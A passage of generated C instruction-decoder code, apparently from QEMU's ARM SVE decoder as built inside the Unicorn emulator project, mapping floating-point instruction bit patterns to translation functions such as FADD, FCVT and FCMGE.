/mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:803 */ if (trans_FTSMUL(ctx, &u.f_rrr_esz)) return true; return false; case 0x6: /* 01100101 ..0..... 000110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:804 */ if (trans_FRECPS(ctx, &u.f_rrr_esz)) return true; return false; case 0x7: /* 01100101 ..0..... 000111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:805 */ if (trans_FRSQRTS(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x1: /* 01100101 ..0..... 001..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 01100101 ..000000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:772 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FADDV(ctx, &u.f_rpr_esz)) return true; return false; case 0x4: /* 01100101 ..000100 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:773 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMAXNMV(ctx, &u.f_rpr_esz)) return true; return false; case 0x5: /* 01100101 ..000101 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:774 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMINNMV(ctx, &u.f_rpr_esz)) return true; return false; case 0x6: /* 01100101 ..000110 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:775 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMAXV(ctx, &u.f_rpr_esz)) return true; return false; case 0x7: /* 01100101 ..000111 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:776 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FMINV(ctx, &u.f_rpr_esz)) return true; return false; case 0xe: /* 01100101 ..001110 001..... ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 10) & 0x7) { case 0x4: /* 01100101 ..001110 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:780 */ if (trans_FRECPE(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0xf: /* 01100101 ..001111 001..... ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 10) & 0x7) { case 0x4: /* 01100101 ..001111 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:781 */ if (trans_FRSQRTE(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x10: /* 01100101 ..010000 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010000 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:785 */ if (trans_FCMGE_ppz0(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 01100101 ..010000 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:786 */ if (trans_FCMGT_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x11: /* 01100101 ..010001 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010001 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:787 */ if (trans_FCMLT_ppz0(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 01100101 ..010001 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:788 */ if (trans_FCMLE_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x12: /* 01100101 ..010010 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010010 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:789 */ if (trans_FCMEQ_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x13: /* 01100101 ..010011 001..... ........ */ disas_sve_extract_pd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..010011 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:790 */ if (trans_FCMNE_ppz0(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x18: /* 01100101 ..011000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:795 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FADDA(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x2: /* 01100101 ..0..... 010..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..0..... 010..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:341 */ if (trans_FCMGE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 010..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:342 */ if (trans_FCMGT_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x3: /* 01100101 ..0..... 011..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..0..... 011..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:343 */ if (trans_FCMEQ_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 011..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:344 */ if (trans_FCMNE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; } return false; case 0x01008000: /* 01100101 ..0..... 1....... ........ */ switch ((insn >> 13) & 0x3) { case 0x0: /* 01100101 ..0..... 100..... ........ */ switch ((insn >> 19) & 0x3) { case 0x0: /* 01100101 ..000... 100..... ........ */ switch ((insn >> 16) & 0x7) { case 0x0: /* 01100101 ..000000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:810 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FADD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..000001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:811 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FSUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x2: /* 01100101 ..000010 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:812 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMUL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x3: /* 01100101 ..000011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:813 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_FSUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x4: /* 01100101 ..000100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:814 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMAXNM_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x5: /* 01100101 ..000101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:815 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMINNM_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x6: /* 01100101 ..000110 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:816 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMAX_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x7: /* 01100101 ..000111 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:817 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMIN_zpzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x1: /* 01100101 ..001... 100..... ........ */ switch ((insn >> 16) & 0x7) { case 0x0: /* 01100101 ..001000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:818 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FABD(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..001001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:819 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FSCALE(ctx, &u.f_rprr_esz)) return true; return false; case 0x2: /* 01100101 ..001010 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:820 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FMULX(ctx, &u.f_rprr_esz)) return true; return false; case 0x4: /* 01100101 ..001100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:821 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_FDIV(ctx, &u.f_rprr_esz)) return true; return false; case 0x5: /* 01100101 ..001101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:822 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_FDIV(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x2: /* 01100101 ..010... 100..... ........ */ disas_sve_extract_disas_sve_Fmt_87(ctx, &u.f_disas_sve46, insn); switch ((insn >> 10) & 0x7) { case 0x0: /* 01100101 ..010... 100000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:835 */ if (trans_FTMAD(ctx, &u.f_disas_sve46)) return true; return false; } return false; case 0x3: /* 01100101 ..011... 100..... ........ */ disas_sve_extract_rdn_i1(ctx, &u.f_rpri_esz, insn); switch (insn & 0x000703c0) { case 0x00000000: /* 01100101 ..011000 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:825 */ if (trans_FADD_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00010000: /* 01100101 ..011001 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:826 */ if (trans_FSUB_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00020000: /* 01100101 ..011010 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:827 */ if (trans_FMUL_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00030000: /* 01100101 ..011011 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:828 */ if (trans_FSUBR_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00040000: /* 01100101 ..011100 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:829 */ if (trans_FMAXNM_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00050000: /* 01100101 ..011101 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:830 */ if (trans_FMINNM_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00060000: /* 01100101 ..011110 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:831 */ if (trans_FMAX_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x00070000: /* 01100101 ..011111 100...00 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:832 */ if (trans_FMIN_zpzi(ctx, &u.f_rpri_esz)) return true; return false; } return false; } return false; case 0x1: /* 01100101 ..0..... 101..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 01100101 ..000000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:880 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTN(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 01100101 ..000001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:881 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTP(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 ..000010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:882 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTM(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 ..000011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:883 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTZ(ctx, &u.f_rpr_esz)) return true; return false; case 0x4: /* 01100101 ..000100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:884 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTA(ctx, &u.f_rpr_esz)) return true; return false; case 0x6: /* 01100101 ..000110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:885 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTX(ctx, &u.f_rpr_esz)) return true; return false; case 0x7: /* 01100101 ..000111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:886 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRINTI(ctx, &u.f_rpr_esz)) return true; return false; case 0x8: /* 01100101 ..001000 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x2: /* 01100101 10001000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:856 */ if (trans_FCVT_sh(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11001000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:858 */ if (trans_FCVT_dh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x9: /* 01100101 ..001001 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x2: /* 01100101 10001001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:857 */ if (trans_FCVT_hs(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11001001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:859 */ if (trans_FCVT_hd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0xa: /* 01100101 ..001010 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11001010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:860 */ if (trans_FCVT_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0xb: /* 01100101 ..001011 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11001011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:861 */ if (trans_FCVT_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0xc: /* 01100101 ..001100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:889 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FRECPX(ctx, &u.f_rpr_esz)) return true; return false; case 0xd: /* 01100101 ..001101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:890 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_FSQRT(ctx, &u.f_rpr_esz)) return true; return false; case 0x10: /* 01100101 ..010000 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11010000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:897 */ if (trans_SCVTF_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x11: /* 01100101 ..010001 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11010001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:905 */ if (trans_UCVTF_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x12: /* 01100101 ..010010 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:893 */ if (trans_SCVTF_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x13: /* 01100101 ..010011 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:901 */ if (trans_UCVTF_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x14: /* 01100101 ..010100 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:894 */ if (trans_SCVTF_sh(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:896 */ if (trans_SCVTF_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:898 */ if (trans_SCVTF_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x15: /* 01100101 ..010101 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:902 */ if (trans_UCVTF_sh(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10010101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:904 */ if (trans_UCVTF_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:906 */ if (trans_UCVTF_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x16: /* 01100101 ..010110 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:895 */ if (trans_SCVTF_dh(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:899 */ if (trans_SCVTF_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x17: /* 01100101 ..010111 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01010111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:903 */ if (trans_UCVTF_dh(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11010111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:907 */ if (trans_UCVTF_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x18: /* 01100101 ..011000 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11011000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:872 */ if (trans_FCVTZS_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x19: /* 01100101 ..011001 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x3: /* 01100101 11011001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:873 */ if (trans_FCVTZU_ds(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1a: /* 01100101 ..011010 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:864 */ if (trans_FCVTZS_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1b: /* 01100101 ..011011 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:865 */ if (trans_FCVTZU_hh(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1c: /* 01100101 ..011100 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:866 */ if (trans_FCVTZS_hs(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10011100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:870 */ if (trans_FCVTZS_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:874 */ if (trans_FCVTZS_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1d: /* 01100101 ..011101 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:867 */ if (trans_FCVTZU_hs(ctx, &u.f_rpr_esz)) return true; return false; case 0x2: /* 01100101 10011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:871 */ if (trans_FCVTZU_ss(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:875 */ if (trans_FCVTZU_sd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1e: /* 01100101 ..011110 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:868 */ if (trans_FCVTZS_hd(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:876 */ if (trans_FCVTZS_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x1f: /* 01100101 ..011111 101..... ........ */ disas_sve_extract_rd_pg_rn_e0(ctx, &u.f_rpr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x1: /* 01100101 01011111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:869 */ if (trans_FCVTZU_hd(ctx, &u.f_rpr_esz)) return true; return false; case 0x3: /* 01100101 11011111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:877 */ if (trans_FCVTZU_dd(ctx, &u.f_rpr_esz)) return true; return false; } return false; } return false; case 0x2: /* 01100101 ..0..... 110..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 01100101 ..0..... 110..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:345 */ if (trans_FCMUO_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 01100101 ..0..... 110..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:346 */ if (trans_FACGE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x3: /* 01100101 ..0..... 111..... ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch ((insn >> 4) & 0x1) { case 0x1: /* 01100101 ..0..... 111..... ...1.... */ /* 